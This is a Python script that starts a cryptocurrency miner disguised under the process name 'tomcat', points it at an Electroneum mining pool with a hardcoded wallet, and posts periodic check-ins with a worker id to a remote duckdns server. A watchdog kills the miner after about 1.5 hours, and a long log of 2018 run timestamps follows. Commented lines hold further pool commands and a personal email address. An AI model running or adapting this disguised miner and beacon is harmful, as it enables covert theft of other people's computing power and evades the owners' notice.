import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:33:05.553443
#2018-02-17 16:19:01.861868
#2018-02-17 18:07:04.000146
#2018-02-17 19:55:01.859439
#2018-02-17 21:42:05.305731
#2018-02-17 23:26:05.888508
#2018-02-18 01:16:01.542785
#2018-02-18 03:04:01.583200
#2018-02-18 04:51:04.440497
#2018-02-18 06:42:07.050607
#2018-02-18 08:31:06.133435
#2018-02-18 10:18:06.869775
#2018-02-18 12:04:04.499213
#2018-02-18 13:49:01.243635
#2018-02-18 15:41:01.853040
#2018-02-18 17:31:01.272345
#2018-02-18 19:18:03.416520
#2018-02-18 21:04:05.418603
#2018-02-18 22:52:04.426951
#2018-02-19 00:39:07.034129
#2018-02-19 02:25:07.602760
#2018-02-19 04:12:07.067916
#2018-02-19 05:57:06.771758
#2018-02-19 07:46:04.432816
#2018-02-19 09:38:01.379131
#2018-02-19 11:27:07.887022
#2018-02-19 13:13:06.679039
#2018-02-19 15:03:05.886939
#2018-02-19 16:50:08.380703
#2018-02-19 18:36:03.721253
#2018-02-19 20:21:01.386134
#2018-02-19 22:10:08.932687
#2018-02-19 23:56:01.965919
#2018-02-20 01:43:05.603222
#2018-02-20 03:32:05.785809
#2018-02-20 05:19:04.301465
#2018-02-20 07:03:05.236341
#2018-02-20 08:48:05.556104
#2018-02-20 10:32:04.848136
#2018-02-20 12:17:05.927617
#2018-02-20 14:04:09.570437
#2018-02-20 15:48:11.863687
#2018-02-20 17:28:04.491815
#2018-02-20 19:17:06.120971
#2018-02-20 21:07:01.392363
#2018-02-20 22:52:06.365528
#2018-02-21 00:36:07.987724
#2018-02-21 02:23:05.327474
#2018-02-21 04:09:05.725261
#2018-02-21 05:55:07.241842
#2018-02-21 07:43:13.057792
#2018-02-21 09:31:06.522627
#2018-02-21 11:19:07.953619
#2018-02-21 13:08:07.544433
#2018-02-21 14:56:03.972897
#2018-02-21 16:44:04.590164
#2018-02-21 18:34:01.716080
#2018-02-21 20:18:06.316247
#2018-02-21 22:05:08.092729
#2018-02-21 23:52:06.905187
#2018-02-22 01:34:07.897167
#2018-02-22 03:23:01.403032
#2018-02-22 05:10:01.813216
#2018-02-22 06:53:06.804729
#2018-02-22 08:40:03.059314
#2018-02-22 10:27:01.619755
#2018-02-22 12:12:07.856764
#2018-02-22 13:57:04.357631
#2018-02-22 15:44:13.955523
#2018-02-22 17:31:08.434407
#2018-02-22 19:18:04.712527
#2018-02-22 21:11:05.276491
#2018-02-22 22:56:05.795630
#2018-02-23 00:44:01.375629
#2018-02-23 02:32:06.882696
#2018-02-23 04:19:06.975542
#2018-02-23 06:06:01.740595
#2018-02-23 07:51:03.964535
#2018-02-23 10:07:03.619302
#2018-02-23 12:01:11.781114
#2018-02-23 13:49:05.969772
#2018-02-23 15:40:11.057615
#2018-02-23 17:28:08.643768
#2018-02-23 19:13:07.960330
#2018-02-23 20:59:01.677011
#2018-02-23 22:45:04.639838
#2018-02-24 00:33:06.053498
#2018-02-24 02:24:08.398854
#2018-02-24 04:13:04.590520
#2018-02-24 06:03:06.847448
#2018-02-24 07:51:01.319698
#2018-02-24 09:35:06.621272
#2018-02-24 11:29:05.556645
#2018-02-24 13:19:02.200797
#2018-02-24 15:10:05.165204
#2018-02-24 16:58:07.450777
#2018-02-24 18:46:07.567346
#2018-02-24 20:38:05.407344
#2018-02-24 22:45:08.371214
#2018-02-25 02:06:07.453402
#2018-02-25 05:46:07.260593
#2018-02-25 11:37:04.547435